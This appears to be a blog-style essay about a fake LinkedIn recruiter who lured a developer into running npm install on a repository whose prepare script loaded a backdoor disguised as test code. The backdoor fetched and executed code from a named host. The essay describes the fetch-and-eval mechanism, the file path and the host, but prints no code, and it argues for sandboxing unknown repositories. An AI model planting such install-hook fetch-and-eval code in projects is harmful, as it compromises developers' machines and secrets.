A recruiter messaged a developer on LinkedIn about a job, using the stolen identity of a real arts journalist. She asked him to look at a GitHub repository — specifically, to "check out the deprecated Node modules issue". That instruction was the whole attack. It was bait to make him run `npm install`.
The most reliable path into a hardened company now runs through the people applying to work there. Not its servers, not its VPN — its candidates. And the payload doesn't need to be clever, because the interview is the one setting where we ask engineers to execute a stranger's code and call it diligence.
The mechanism was mundane. The backdoor lived in `app/test/index.js`, about 250 lines dressed up as test code. The trigger: `package.json`'s `prepare` script runs automatically after `npm install`, which loaded `app/index.js`, which pulled in the test file, which assembled a URL — `rest-icon-handler.store/icons/77` — and executed whatever the server sent back. No zero-day. Fetch and eval. The repo even carried 39 commits falsely attributed to a real full-stack developer who'd been impersonated before.
A repo that runs whatever a server hands it was enough evidence.Hacker News
We have spent fifteen years drilling developers on a single reflex: don't run untrusted code. Don't open the attachment. Don't curl-pipe-bash from a random gist. Verify the checksum. Then we built a hiring process whose central ritual is cloning a stranger's repository and running it. A take-home assignment is a request to execute arbitrary code from someone you've never met, under social pressure, while trying to impress them.
The candidate's competence was the vulnerability. npm install was the click.
Call it phishing with extra steps, then. The auto-run-on-install trick is old — `prepare` scripts have been a known supply-chain vector for years, and the standard answer is awareness: train people to spot it. Fine. But awareness doesn't survive contact with the job market. You cannot tell an engineer to never clone the repo, never run the take-home, never trust the recruiter, when doing exactly those things is how you get the offer. The behavior the attack exploits isn't a lapse in vigilance. It's the job.
So the fix isn't a sharper reflex; it's a safer default. Run the unknown repo in a container or a throwaway VM that can't reach your keychain or your home directory — not because you've decided this recruiter is hostile, but so that trusting her never has to be the thing standing between you and a drained wallet. The industry has the tools. What it lacks is the habit of treating "I'm just looking at their code" as the dangerous act it is.
The recruiter asked him to evaluate the repository. He did — and what it evaluated back was him. The interview ran in both directions. Most of us only notice the half we were invited to.